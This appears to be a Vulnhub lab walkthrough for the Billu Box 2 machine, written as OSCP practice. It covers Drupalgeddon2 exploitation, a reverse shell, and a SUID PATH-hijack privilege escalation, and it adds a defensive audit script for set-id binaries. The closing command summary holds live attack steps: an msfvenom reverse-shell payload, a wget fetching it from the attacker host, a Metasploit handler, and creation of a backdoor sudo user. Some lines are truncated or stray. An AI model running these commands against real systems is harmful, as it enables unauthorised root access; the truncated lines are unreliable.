This is the Billu Box 2 Vulnhub walkthrough. Here’s what you will learn from this walkthrough. One thing you will learn is how to do binary analysis for Linux privilege escalation, but that is all I will give away. This is an excellent OSCP-like box you can use to practice for the OSCP exam for free.
What is an OSCP-like box?
An OSCP-like box is one that is more realistic in its intended exploitation than other boxes that rely on less practical exploit methodologies such as steganography, cracking complex hash sequences, etc. In a nutshell, it means that the box is something you could expect to see in use in real life. You won’t find mind puzzles and abstract sudoku-like challenges in these boxes.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Here’s What You Need
- Billu Box 2 VM from Vulnhub
- Kali Linux VM from Offensive Security
Initial Enumeration
We kick off the initial enumeration stage with a simple nmap scan of the target using the command nmap -sC -sT -sV -p- 10.0.50.63 (all commands are also collected in the summary at the end of this post).
It looks like SSH is open, but we will focus on the other open ports. There are two open web services, on port 80 and port 8080. Let’s start with 80.
Get Your First Shell
We quickly find that the site is running a Drupal installation. That brings to mind several Drupal exploits; let’s try Drupalgeddon2. We grab the exploit from GitHub using the command git clone https://github.com/dreadlocked/Drupalgeddon2 and then run it against the target with ruby drupalgeddon2.rb http://10.0.50.63:80.
Upgrade Your Shell
As of now we have a limited web shell on the target, but we can upgrade to a better one. To do this we start a netcat listener on the Kali Linux machine and then execute a reverse shell payload written in Python as a one-liner on the target. There are two more steps to fully upgrade, though.
We need to use python -c 'import pty;pty.spawn("/bin/bash")' to get a proper PTY, and then stty -echo to stabilize the shell.
Linux Privilege Escalation
The initial enumeration for Linux privilege escalation seems to suggest that SUID binary exploitation is the way to go here. After we run the command
Let’s take a look at this file named “s” in the /opt directory. Usually we can just read a vulnerable cron job or a bash script, but in this case we are going after a compiled SUID binary, so the strings utility will help here.
What we find is that one line reads “scp -r /root/* ….” so what does that mean? It appears that the scp command is copying blah blah, but wait! scp is not specified in its absolute path form. That means the binary relies on a PATH lookup to find scp, and we can hijack the execution by placing our own scp earlier in the PATH search order.
To do this we will add the tmp folder to the front of the PATH variable so that the system will search in /tmp for the scp binary first. Then we make a reverse shell payload using msfvenom (think about how you can do this without Metasploit…).
And then we serve the payload and make a call to download it from the target.
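The weakness exploited above is that a set-id binary runs an external command by bare name, so whatever PATH the caller supplies decides which scp actually executes. The following audit script is an added example written for this post, not code from the walkthrough or from the box; it reimplements the part of strings that matters here (printable runs of 4 or more bytes), flags embedded command lines whose program is resolved through PATH rather than given as an absolute path, and reports whether the file is SUID/SGID. The SAMPLE_BINARY byte blob and the command lines inside it are constructed for the example and are not the contents of the real /opt/s; the function names are my own. Run it with file paths as arguments to audit real binaries, or with no arguments to see it work on the embedded sample.

```python
"""Audit set-id binaries for embedded commands that depend on PATH lookup."""
import os
import re
import shlex
import stat

# Shell builtins are resolved inside sh itself, so they are not PATH lookups.
_SHELL_BUILTINS = {"echo", "cd", "export", "exit", "test", "set", "unset", "read", "eval"}

# A bare program name: letters/digits/._+- and no slash (an absolute path has one).
_BARE_COMMAND = re.compile(r"^[A-Za-z][A-Za-z0-9_.+-]*$")


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Pure-Python stand-in for `strings`: printable-ASCII runs of at least min_len bytes."""
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    return [r.decode("ascii") for r in runs]


def path_dependent_commands(strings: list[str]) -> list[str]:
    """Return embedded command lines whose program would be found via PATH.

    A string is reported when its first word is a bare name (no '/'), is not a
    shell builtin, and at least one argument follows, e.g. 'scp -r /root/* ...'.
    '/usr/bin/scp ...' is not reported. Heuristic: expect some false positives
    on binaries that embed help text, and review each hit by hand.
    """
    findings = []
    for s in strings:
        try:
            words = shlex.split(s)
        except ValueError:
            continue  # unbalanced quotes: not a command line
        if len(words) < 2:
            continue
        cmd = words[0]
        if "/" in cmd or cmd in _SHELL_BUILTINS or not _BARE_COMMAND.match(cmd):
            continue
        findings.append(s)
    return findings


def is_setuid_or_setgid(path: str) -> bool:
    """True when the file carries the SUID or SGID bit."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def audit_binary(path: str) -> dict:
    """Audit one file on disk: set-id status plus any PATH-dependent commands."""
    with open(path, "rb") as f:
        data = f.read()
    return {
        "path": path,
        "setid": is_setuid_or_setgid(path),
        "path_dependent": path_dependent_commands(extract_strings(data)),
    }


# Constructed blob standing in for a small set-id binary (made up for this example,
# not the real /opt/s): one bare 'scp' call, one absolute-path 'tar' call, a builtin,
# and the usual compiler/library strings that should not be reported.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"libc.so.6\x00system\x00"
    + b"scp -r /root/* backup@10.0.0.5:/srv/backup\x00"
    + b"/usr/bin/tar czf /tmp/etc.tgz /etc\x00"
    + b"echo backup complete\x00"
    + b"GCC: (Ubuntu 5.4.0-6ubuntu1) 5.4.0\x00"
)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        for p in sys.argv[1:]:
            r = audit_binary(p)
            tag = "SETID " if r["setid"] else "      "
            for cmd in r["path_dependent"]:
                print(f"{tag}{r['path']}: PATH-dependent command: {cmd!r}")
    else:
        for cmd in path_dependent_commands(extract_strings(SAMPLE_BINARY)):
            print("PATH-dependent command:", repr(cmd))
```

On the sample blob only the scp line is reported; the tar line is invoked by absolute path and echo is a shell builtin. On the developer side the fix is the mirror image of the attack: call /usr/bin/scp by its absolute path, or set PATH to a fixed trusted value before calling system(), and ideally avoid system() in set-id programs altogether.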
Once you are root there is nothing else to do.
Here is an overview of all the commands we used in this Billu Box 2 Vulnhub walkthrough.
# initial enumeration
nmap -sC -sT -sV -p- 10.0.50.63
# get your first shell
git clone https://github.com/dreadlocked/Drupalgeddon2
cd Drupalgeddon2
chmod +x drupalgeddon2.rb
ruby drupalgeddon2.rb http://10.0.50.63:80
# upgrade to a fully interactive TTY shell
python -c 'import ..;'
[-] The target timed out ~ Net::ReadTimeout with #<TCPSocket:(closed)>
# stabilize this place
python -c 'import pty;pty.spawn("/bin/bash")'
stty -echo
# alter the search order for the PATH
PATH=/tmp:$PATH
msfvenom -p linux/x86/shell/reverse_tcp LPORT=1234 LHOST=10.0.50.58 -f elf > scp
PATH=/tmp:$PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# put the evil scp in the right spot
wget http://10.0.50.58/scp -O /tmp/scp
cd /tmp
chmod +x scp
cd /opt
./s
# start a staged listener in Metasploit (LHOST/LPORT match the msfvenom payload above)
use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
set LHOST 10.0.50.58
set LPORT 1234
run
# make a new user we can use to ssh to the box with
useradd -m -s /bin/bash -p $(openssl passwd -1 "Password1") guru
# add the new user to the sudoers group
usermod -aG sudo guru